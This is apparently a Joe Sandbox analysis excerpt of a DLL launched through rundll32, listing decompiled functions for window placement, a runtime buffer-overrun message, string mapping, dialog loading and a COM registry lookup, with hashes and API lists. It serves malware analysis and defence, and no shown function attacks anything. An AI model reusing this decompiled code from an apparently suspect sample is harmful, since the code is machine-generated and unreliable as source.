Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prologPattern
String ID:
API String ID: 897514543-0
Opcode ID: 400228ba49e4800a67e3a38d3567afe107d057f9fa27c1e0196e875ef419b6f0
Instruction ID: e5f9903ccf7cdd00105ec8572482158fef9e459befd851420e55a1fcda6e3601
Opcode Fuzzy Hash: 400228ba49e4800a67e3a38d3567afe107d057f9fa27c1e0196e875ef419b6f0
Instruction Fuzzy Hash: 4191EFB690010DEFCF06DFA4D995CEEBBB9EF08244F51411AF906A7251DB34AE06CB64

Uniqueness

Uniqueness Score: -1.00%

Function 100219DD Relevance: 19.7, APIs: 13, Instructions: 174
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E100219DD(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v5;
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				intOrPtr _t55;
				struct HWND__* _t56;
				intOrPtr _t78;
				intOrPtr _t90;
				signed int _t99;
				struct HWND__* _t100;
				struct HWND__* _t102;
				void* _t104;
				long _t110;
				void* _t113;
				struct HWND__* _t115;
				void* _t117;
				intOrPtr _t119;
				intOrPtr _t123;

				_t113 = __edx;
				_t119 = __ecx;
				_v12 = __ecx;
				_v8 = E100202AB(__ecx);
				_t55 = _a4;
				if(_t55 == 0) {
					if((_v5 & 0x00000040) == 0) {
						_t56 = GetWindow( *(__ecx + 0x1c), 4);
					} else {
						_t56 = GetParent( *(__ecx + 0x1c));
					}
					_t115 = _t56;
					if(_t115 != 0) {
						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
						if(_t100 != 0) {
							_t115 = _t100;
						}
					}
				} else {
					_t115 =  *(_t55 + 0x1c);
				}
				GetWindowRect( *(_t119 + 0x1c),  &_v44);
				if((_v5 & 0x00000040) != 0) {
					_t102 = GetParent( *(_t119 + 0x1c));
					GetClientRect(_t102,  &_v28);
					GetClientRect(_t115,  &_v60);
					MapWindowPoints(_t115, _t102,  &_v60, 2);
				} else {
					if(_t115 != 0) {
						_t99 = GetWindowLongA(_t115, 0xfffffff0);
						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
							_t115 = 0;
						}
					}
					_v100 = 0x28;
					if(_t115 != 0) {
						GetWindowRect(_t115,  &_v60);
						E10007B50(E10007AE5(_t115, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t90 = E10006C53();
						if(_t90 != 0) {
							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
						}
						E10007B50(E10007AE5(_t90, 1),  &_v100);
						CopyRect( &_v60,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t117 = _v44.right - _v44.left;
				asm("cdq");
				_t104 = _v44.bottom - _v44.top;
				asm("cdq");
				_t114 = _v60.bottom;
				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
				asm("cdq");
				asm("cdq");
				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
				if(_t110 >= _v28.left) {
					_t78 = _v28.right;
					if(_t117 + _t110 > _t78) {
						_t110 = _t78 - _v44.right + _v44.left;
					}
				} else {
					_t110 = _v28.left;
				}
				if(_t123 >= _v28.top) {
					if(_t104 + _t123 > _v28.bottom) {
						_t123 = _v44.top - _v44.bottom + _v28.bottom;
					}
				} else {
					_t123 = _v28.top;
				}
				return E100204FE(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
			}

APIs

Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6

GetParent.USER32(?), ref: 10021A08
SendMessageA.USER32 ref: 10021A2B
GetWindowRect.USER32 ref: 10021A44
GetWindowLongA.USER32 ref: 10021A57
CopyRect.USER32 ref: 10021AA4
CopyRect.USER32 ref: 10021AAE
GetWindowRect.USER32 ref: 10021AB7
CopyRect.USER32 ref: 10021AD3

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID:
API String ID: 808654186-0
Opcode ID: e76da2122a763930bd691be976f21c44a84b6c1e628a4a4a2f822a10c9fdf520
Instruction ID: c5023cb8dd4c56e62e69e6e4efe16b58097a74c7fe0422dfe49a5ff72fe10001
Opcode Fuzzy Hash: e76da2122a763930bd691be976f21c44a84b6c1e628a4a4a2f822a10c9fdf520
Instruction Fuzzy Hash: 9A51AD76A00219AFDB01DBA8DC89FEEBBBDEF48350F154115E901F7281EB30B9458B60

Uniqueness

Uniqueness Score: -1.00%

Function 10016BAA Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 111
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E10016BAA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t32;
				intOrPtr* _t33;
				void* _t41;
				signed int _t54;
				unsigned int _t59;
				void* _t75;
				intOrPtr* _t76;
				signed int _t81;
				char* _t83;
				void* _t86;
				intOrPtr _t87;
				void* _t88;
				intOrPtr _t89;

				_push(0x118);
				_push(0x10042558);
				E10012514(__ebx, __edi, __esi);
				_t32 =  *0x1004c470; // 0x12db9c4b
				 *((intOrPtr*)(_t88 - 0x1c)) = _t32;
				_t33 =  *0x1004f708; // 0x0
				if(_t33 == 0) {
					if( *((intOrPtr*)(_t88 + 8)) == 1) {
						_t83 = "Buffer overrun detected!";
						 *(_t88 - 0x128) = "A buffer overrun has been detected which has corrupted the program\'s\ninternal state.  The program cannot safely continue execution and must\nnow be terminated.\n";
						_t86 = 0xb9;
					} else {
						_t83 = "Unknown security failure detected!";
						 *(_t88 - 0x128) = "A security error of unknown cause has been detected which has\ncorrupted the program\'s internal state.  The program cannot safely\ncontinue execution and must now be terminated.\n";
						_t86 = 0xd4;
					}
					 *((char*)(_t88 - 0x20)) = 0;
					if(GetModuleFileNameA(0, _t88 - 0x124, 0x104) == 0) {
						E10017B90(_t88 - 0x124, "<program name unknown>");
					}
					_t71 = _t88 - 0x124;
					if(E10011820(_t88 - 0x124) + 0xb > 0x3c) {
						E10019E20(E10011820(_t71) + _t88 - 0xf3, "...", 3);
						_t89 = _t89 + 0x10;
					}
					_t41 = E10011820(_t71);
					_pop(_t75);
					E10010B20(_t41 + _t86 + 0x0000000c + 0x00000003 & 0xfffffffc, _t75);
					 *((intOrPtr*)(_t88 - 0x18)) = _t89;
					_t87 = _t89;
					E10017B90(_t87, _t83);
					E10017BA0(_t87, "\n\n");
					E10017BA0(_t87, "Program: ");
					E10017BA0(_t87, _t71);
					E10017BA0(_t87, "\n\n");
					E10017BA0(_t87,  *(_t88 - 0x128));
					_push(0x12010);
					_push("Microsoft Visual C++ Runtime Library");
					_push(_t87);
					E10019D1D();
					_t89 = _t89 + 0x3c;
				} else {
					 *(_t88 - 4) = 0;
					 *_t33( *((intOrPtr*)(_t88 + 8)),  *((intOrPtr*)(_t88 + 0xc)));
					 *(_t88 - 4) =  *(_t88 - 4) | 0xffffffff;
				}
				E10011F56(3);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t81 =  *(_t89 + 4);
				_t76 =  *((intOrPtr*)(_t89 + 8));
				if((_t81 & 0x00000003) != 0) {
					if((_t81 & 0x00000001) == 0) {
						L27:
						_t54 =  *_t81;
						_t81 = _t81 + 2;
						if(_t54 !=  *_t76) {
							goto L22;
						} else {
							_t54 = _t54;
							if(_t54 == 0) {
								goto L21;
							} else {
								if(_t54 !=  *((intOrPtr*)(_t76 + 1))) {
									goto L22;
								} else {
									if(_t54 == 0) {
										goto L21;
									} else {
										_t76 = _t76 + 2;
										goto L12;
									}
								}
							}
						}
					} else {
						_t54 =  *_t81;
						_t81 = _t81 + 1;
						if(_t54 !=  *_t76) {
							goto L22;
						} else {
							_t76 = _t76 + 1;
							if(_t54 == 0) {
								goto L21;
							} else {
								if((_t81 & 0x00000002) == 0) {
									goto L12;
								} else {
									goto L27;
								}
							}
						}
					}
				} else {
					while(1) {
						L12:
						_t54 =  *_t81;
						if(_t54 !=  *_t76) {
							break;
						}
						_t54 = _t54;
						if(_t54 == 0) {
							L21:
							return 0;
						} else {
							if(_t54 !=  *((intOrPtr*)(_t76 + 1))) {
								break;
							} else {
								_t59 = _t54;
								if(_t59 == 0) {
									goto L21;
								} else {
									_t54 = _t59 >> 0x10;
									if(_t54 !=  *((intOrPtr*)(_t76 + 2))) {
										break;
									} else {
										_t54 = _t54;
										if(_t54 == 0) {
											goto L21;
										} else {
											if(_t54 !=  *((intOrPtr*)(_t76 + 3))) {
												break;
											} else {
												_t76 = _t76 + 4;
												_t81 = _t81 + 4;
												if(_t54 != 0) {
													continue;
												} else {
													goto L21;
												}
											}
										}
									}
								}
							}
						}
						goto L32;
					}
					L22:
					asm("sbb eax, eax");
					return (_t54 << 1) + 1;
				}
				L32:
			}

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,10042558,00000118,10011796,00000001,00000000,10041D50,00000008,10016B00,00000000,00000000,00000000), ref: 10016C2B
_strlen.LIBCMT ref: 10016C51
_strlen.LIBCMT ref: 10016C62
_strncpy.LIBCMT ref: 10016C7C
_strlen.LIBCMT ref: 10016C85

Strings

Unknown security failure detected!, xrefs: 10016BF1
Program: , xrefs: 10016CB2
Microsoft Visual C++ Runtime Library, xrefs: 10016CDC
..., xrefs: 10016C76
<program name unknown>, xrefs: 10016C35
Buffer overrun detected!, xrefs: 10016C07, 10016C9F

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _strlen$FileModuleName_strncpy
String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
API String ID: 2455649890-1673886896
Opcode ID: 1963d9bee1367311d52fddb125b014c05f3a23a3ac48ca314c1b8795c44db6bb
Instruction ID: 88295e5d41c60b50e9a3e58cda1e4c53c685b81e948abb858cf034152a287b35
Opcode Fuzzy Hash: 1963d9bee1367311d52fddb125b014c05f3a23a3ac48ca314c1b8795c44db6bb
Instruction Fuzzy Hash: 6731B476A052146BDB15DB60CC82FDE36B8EF05214F600169F514EF142DB38EBD18BA9

Uniqueness

Uniqueness Score: -1.00%

Function 10018081 Relevance: 16.8, APIs: 11, Instructions: 299
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E10018081(void* __ebx, void* __edi, int __esi, void* __eflags) {
				signed int _t119;
				intOrPtr _t120;
				int _t122;
				char* _t125;
				int _t132;
				signed int _t134;
				int _t137;
				int _t138;
				short* _t160;
				short* _t163;
				int _t164;
				signed int _t165;
				long _t169;
				signed int _t172;
				int _t181;
				char* _t183;
				int _t184;
				signed int _t186;
				int _t187;
				int _t190;
				void* _t192;
				short* _t193;
				char* _t195;
				char* _t196;
				signed int _t199;

				_t185 = __esi;
				_push(0x38);
				_push(0x10042708);
				E10012514(__ebx, __edi, __esi);
				_t199 =  *0x1004f73c; // 0x1
				if(_t199 == 0) {
					_t185 = 1;
					if(LCMapStringW(0, 0x100, 0x10042704, 1, 0, 0) == 0) {
						_t169 = GetLastError();
						__eflags = _t169 - 0x78;
						if(_t169 == 0x78) {
							 *0x1004f73c = 2;
						}
					} else {
						 *0x1004f73c = 1;
					}
				}
				if( *(_t192 + 0x14) <= 0) {
					L11:
					_t119 =  *0x1004f73c; // 0x1
					if(_t119 == 2 || _t119 == 0) {
						 *(_t192 - 0x28) = 0;
						_t183 = 0;
						 *(_t192 - 0x3c) = 0;
						__eflags =  *(_t192 + 8);
						if( *(_t192 + 8) == 0) {
							_t138 =  *0x1004f724; // 0x0
							 *(_t192 + 8) = _t138;
						}
						__eflags =  *(_t192 + 0x20);
						if( *(_t192 + 0x20) == 0) {
							_t137 =  *0x1004f734; // 0x0
							 *(_t192 + 0x20) = _t137;
						}
						_t120 = E1001A444(0,  *(_t192 + 8));
						 *((intOrPtr*)(_t192 - 0x40)) = _t120;
						__eflags = _t120 - 0xffffffff;
						if(_t120 != 0xffffffff) {
							__eflags = _t120 -  *(_t192 + 0x20);
							if(__eflags == 0) {
								_t186 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 + 0x18),  *(_t192 + 0x1c));
								L61:
								__eflags =  *(_t192 - 0x28);
								if(__eflags != 0) {
									_push( *(_t192 - 0x28));
									E100107C8(0, _t183, _t186, __eflags);
								}
								_t122 = _t186;
								goto L64;
							}
							_push(0);
							_push(0);
							_t175 = _t192 + 0x14;
							_push(_t192 + 0x14);
							_push( *(_t192 + 0x10));
							_push(_t120);
							_push( *(_t192 + 0x20));
							_t125 = E1001A487(0, _t183, _t185, __eflags);
							_t195 =  &(_t193[0xc]);
							 *(_t192 - 0x28) = _t125;
							__eflags = _t125;
							if(_t125 == 0) {
								goto L46;
							}
							_t187 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc), _t125,  *(_t192 + 0x14), 0, 0);
							 *(_t192 - 0x24) = _t187;
							__eflags = _t187;
							if(_t187 == 0) {
								_t186 =  *(_t192 - 0x48);
								L58:
								__eflags =  *(_t192 - 0x3c);
								if(__eflags != 0) {
									_push(_t183);
									E100107C8(0, _t183, _t186, __eflags);
								}
								goto L61;
							}
							 *(_t192 - 4) = 0;
							E10010B20(_t126 + 0x00000003 & 0xfffffffc, _t175);
							 *(_t192 - 0x18) = _t195;
							_t183 = _t195;
							 *(_t192 - 0x44) = _t183;
							E10011C50(_t183, 0, _t187);
							_t196 =  &(_t195[0xc]);
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							__eflags = _t183;
							if(_t183 != 0) {
								L54:
								_t132 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x28),  *(_t192 + 0x14), _t183,  *(_t192 - 0x24));
								 *(_t192 - 0x24) = _t132;
								__eflags = _t132;
								if(__eflags != 0) {
									_push( *(_t192 + 0x1c));
									_push( *(_t192 + 0x18));
									_push(_t192 - 0x24);
									_push(_t183);
									_push( *(_t192 + 0x20));
									_push( *((intOrPtr*)(_t192 - 0x40)));
									_t134 = E1001A487(0, _t183, _t187, __eflags);
									asm("sbb esi, esi");
									_t186 =  ~( ~_t134);
									goto L58;
								}
								goto L55;
							} else {
								_t183 = E100107B6( *(_t192 - 0x24));
								__eflags = _t183;
								if(_t183 == 0) {
									L55:
									_t186 = 0;
									goto L58;
								}
								E10011C50(_t183, 0,  *(_t192 - 0x24));
								_t196 =  &(_t196[0xc]);
								 *(_t192 - 0x3c) = 1;
								goto L54;
							}
						} else {
							goto L46;
						}
					} else {
						if(_t119 != 1) {
							L46:
							_t122 = 0;
							L64:
							return E1001254F(_t122);
						}
						_t184 = 0;
						 *(_t192 - 0x2c) = 0;
						 *(_t192 - 0x38) = 0;
						 *(_t192 - 0x34) = 0;
						if( *(_t192 + 0x20) == 0) {
							_t164 =  *0x1004f734; // 0x0
							 *(_t192 + 0x20) = _t164;
						}
						_t190 = MultiByteToWideChar( *(_t192 + 0x20), 1 + (0 |  *((intOrPtr*)(_t192 + 0x24)) != 0x00000000) * 8,  *(_t192 + 0x10),  *(_t192 + 0x14), 0, 0);
						 *(_t192 - 0x30) = _t190;
						if(_t190 == 0) {
							goto L46;
						} else {
							 *(_t192 - 4) = 1;
							E10010B20(_t190 + _t190 + 0x00000003 & 0xfffffffc, _t172);
							 *(_t192 - 0x18) = _t193;
							 *(_t192 - 0x1c) = _t193;
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							if( *(_t192 - 0x1c) != 0) {
								L21:
								if(MultiByteToWideChar( *(_t192 + 0x20), 1,  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 - 0x1c), _t190) == 0) {
									L36:
									_t219 =  *(_t192 - 0x34);
									if( *(_t192 - 0x34) != 0) {
										_push( *(_t192 - 0x20));
										E100107C8(0, _t184, _t190, _t219);
									}
									_t220 =  *(_t192 - 0x38);
									if( *(_t192 - 0x38) != 0) {
										_push( *(_t192 - 0x1c));
										E100107C8(0, _t184, _t190, _t220);
									}
									_t122 = _t184;
									goto L64;
								}
								_t184 = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190, 0, 0);
								 *(_t192 - 0x2c) = _t184;
								if(_t184 == 0) {
									goto L36;
								}
								if(( *(_t192 + 0xd) & 0x00000004) == 0) {
									 *(_t192 - 4) = 2;
									E10010B20(_t184 + _t184 + 0x00000003 & 0xfffffffc, _t172);
									 *(_t192 - 0x18) = _t193;
									 *(_t192 - 0x20) = _t193;
									 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
									__eflags =  *(_t192 - 0x20);
									if( *(_t192 - 0x20) != 0) {
										L31:
										__eflags = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 - 0x20), _t184);
										if(__eflags != 0) {
											_push(0);
											_push(0);
											__eflags =  *(_t192 + 0x1c);
											if(__eflags != 0) {
												_push( *(_t192 + 0x1c));
												_push( *(_t192 + 0x18));
											} else {
												_push(0);
												_push(0);
											}
											_t184 = WideCharToMultiByte( *(_t192 + 0x20), 0,  *(_t192 - 0x20), _t184, ??, ??, ??, ??);
										}
										goto L36;
									} else {
										_t160 = E100107B6(_t184 + _t184);
										 *(_t192 - 0x20) = _t160;
										__eflags = _t160;
										if(__eflags == 0) {
											goto L36;
										}
										 *(_t192 - 0x34) = 1;
										goto L31;
									}
								}
								if( *(_t192 + 0x1c) != 0 && _t184 <=  *(_t192 + 0x1c)) {
									LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 + 0x18),  *(_t192 + 0x1c));
								}
								goto L36;
							} else {
								_t163 = E100107B6(_t190 + _t190);
								_pop(_t172);
								 *(_t192 - 0x1c) = _t163;
								if(_t163 == 0) {
									goto L46;
								}
								 *(_t192 - 0x38) = 1;
								goto L21;
							}
						}
					}
				}
				_t181 =  *(_t192 + 0x14);
				_t165 =  *(_t192 + 0x10);
				while(1) {
					_t172 = _t181 - 1;
					if( *_t165 == 0) {
						break;
					}
					_t165 = _t165 + 1;
					if(_t172 != 0) {
						continue;
					}
					_t172 = _t172 | 0xffffffff;
					break;
				}
				 *(_t192 + 0x14) =  *(_t192 + 0x14) + (_t165 | 0xffffffff) - _t172;
				goto L11;
			}

APIs

LCMapStringW.KERNEL32(00000000,00000100,10042704,00000001,00000000,00000000,10042708,00000038,10012971,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 100180A8
GetLastError.KERNEL32 ref: 100180BA
MultiByteToWideChar.KERNEL32(?,00000000,10012C1E,?,00000000,00000000,10042708,00000038,10012971,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 10018141
MultiByteToWideChar.KERNEL32(?,00000001,10012C1E,?,?,00000000), ref: 100181C2
LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 100181DC
LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 10018217

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1775797328-0
Opcode ID: 2a0531d2a3256dac13ccc396c07934314eadd6156838d5e530a716c7ff313fc5
Instruction ID: 011406151073c2933195e68419e397d46f3af982358df5fa752d459d02b2d26b
Opcode Fuzzy Hash: 2a0531d2a3256dac13ccc396c07934314eadd6156838d5e530a716c7ff313fc5
Instruction Fuzzy Hash: 3CB1467280025AEFDF12DFA0DC858DE7BB6FB09394F118229F910AA161D735DBA1DB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001F2DE Relevance: 16.6, APIs: 11, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1001F2DE(intOrPtr* __ecx) {
				signed int _t45;
				void* _t49;
				CHAR* _t50;
				signed int _t54;
				signed char _t60;
				struct HWND__* _t62;
				CHAR* _t63;
				signed int _t68;
				struct HINSTANCE__* _t81;
				void* _t83;
				intOrPtr* _t85;
				void* _t87;
				void* _t89;

				E10011BF0(0x1003a3e8, _t87);
				_t85 = __ecx;
				_t68 =  *(__ecx + 0x5c);
				 *((intOrPtr*)(_t87 - 0x10)) = _t89 - 0x18;
				 *((intOrPtr*)(_t87 - 0x1c)) = __ecx;
				 *(_t87 - 0x18) =  *(__ecx + 0x58);
				_t45 = E100373B5();
				_t81 =  *(_t45 + 0xc);
				if( *(_t85 + 0x54) != 0) {
					_t81 =  *(E100373B5() + 0xc);
					_t45 = LoadResource(_t81, FindResourceA(_t81,  *(_t85 + 0x54), 5));
					 *(_t87 - 0x18) = _t45;
				}
				if( *(_t87 - 0x18) != 0) {
					_t45 = LockResource( *(_t87 - 0x18));
					_t68 = _t45;
				}
				if(_t68 != 0) {
					 *(_t87 - 0x14) = E1001EE1E(_t85);
					E10022196();
					 *(_t87 - 0x20) =  *(_t87 - 0x20) & 0x00000000;
					__eflags =  *(_t87 - 0x14);
					if( *(_t87 - 0x14) != 0) {
						_t62 = GetDesktopWindow();
						__eflags =  *(_t87 - 0x14) - _t62;
						if( *(_t87 - 0x14) != _t62) {
							_t63 = IsWindowEnabled( *(_t87 - 0x14));
							__eflags = _t63;
							if(_t63 != 0) {
								EnableWindow( *(_t87 - 0x14), 0);
								 *(_t87 - 0x20) = 1;
							}
						}
					}
					 *(_t87 - 4) =  *(_t87 - 4) & 0x00000000;
					_push(_t85);
					E100237EE();
					_t49 = E100220EE(_t87,  *(_t87 - 0x14));
					_push(_t81);
					_push(_t49);
					_push(_t68);
					_t50 = E1001F0D1(_t85);
					__eflags = _t50;
					if(_t50 != 0) {
						__eflags =  *(_t85 + 0x38) & 0x00000010;
						if(( *(_t85 + 0x38) & 0x00000010) != 0) {
							_t83 = 4;
							_t60 = E100202AB(_t85);
							__eflags = _t60 & 0x00000001;
							if((_t60 & 0x00000001) != 0) {
								_t83 = 5;
							}
							E10021B92(_t85, _t83);
						}
						__eflags =  *(_t85 + 0x1c);
						if( *(_t85 + 0x1c) != 0) {
							E100204FE(_t85, 0, 0, 0, 0, 0, 0x97);
						}
					}
					 *(_t87 - 4) =  *(_t87 - 4) | 0xffffffff;
					__eflags =  *(_t87 - 0x20);
					if( *(_t87 - 0x20) != 0) {
						EnableWindow( *(_t87 - 0x14), 1);
					}
					__eflags =  *(_t87 - 0x14);
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *(_t85 + 0x1c);
						if(__eflags == 0) {
							SetActiveWindow( *(_t87 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t85 + 0x60))();
					E1001EE58(_t85, __eflags);
					__eflags =  *(_t85 + 0x54);
					if( *(_t85 + 0x54) != 0) {
						FreeResource( *(_t87 - 0x18));
					}
					_t54 =  *(_t85 + 0x40);
				} else {
					_t54 = _t45 | 0xffffffff;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t87 - 0xc));
				return _t54;
			}

APIs

__EH_prolog.LIBCMT ref: 1001F2E3
FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001F31B
LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F323

Part of subcall function 10022196: UnhookWindowsHookEx.USER32(?), ref: 100221BB

LockResource.KERNEL32(00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F335
GetDesktopWindow.USER32 ref: 1001F362
IsWindowEnabled.USER32(00000000), ref: 1001F370
EnableWindow.USER32(00000000,00000000), ref: 1001F37F
EnableWindow.USER32(00000000,00000001), ref: 1001F40E
GetActiveWindow.USER32 ref: 1001F419
SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F427
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F443

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
String ID:
API String ID: 833315621-0
Opcode ID: 36a7553cafaefb879fb01c6852922989da2301ce548023a2a0f367a123b38a93
Instruction ID: 07bae71fa05b1da8482edcdebb19160d7d4844d0efed804ca524429d20d1f7a4
Opcode Fuzzy Hash: 36a7553cafaefb879fb01c6852922989da2301ce548023a2a0f367a123b38a93
Instruction Fuzzy Hash: D14190359007199FDB12DFA5C889BBEB7F5FF14751F10011DF102AA1A2CB74AA81CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1002583A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 68
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E1002583A(void* _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				int _v16;
				char* _v20;
				int _v24;
				void* __ebx;
				void* __edi;
				signed int _t35;
				void* _t37;
				void* _t42;
				int* _t43;

				_t43 = 0;
				_v12 = 0;
				_v20 = E100017D0(_a8, 0x104);
				_v16 = 0x104;
				_t42 = RegOpenKeyA;
				_v24 = 0;
				if(RegOpenKeyA(0x80000000, ?str?,  &_v12) == 0) {
					_push(_t37);
					_v8 = 0;
					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
						_a4 = 0;
						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
							_t35 = RegQueryValueExA(_a4, 0x1003da51, 0,  &_v24, _v20,  &_v16);
							asm("sbb esi, esi");
							_t43 =  ~_t35 + 1;
							RegCloseKey(_a4);
						}
						RegCloseKey(_v8);
					}
					RegCloseKey(_v12);
					_pop(_t37);
				}
				E10006CE2(_t37, _a8, _t42, 0xffffffff);
				return _t43;
			}

APIs

RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10025872
RegOpenKeyA.ADVAPI32(?,?,?), ref: 10025886
RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 100258A1
RegQueryValueExA.ADVAPI32(?,1003DA51,00000000,?,?,?), ref: 100258BB
RegCloseKey.ADVAPI32(?), ref: 100258CB
RegCloseKey.ADVAPI32(?), ref: 100258D0
RegCloseKey.ADVAPI32(?), ref: 100258D5

Strings

CLSID, xrefs: 1002585C
InProcServer32, xrefs: 10025896

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
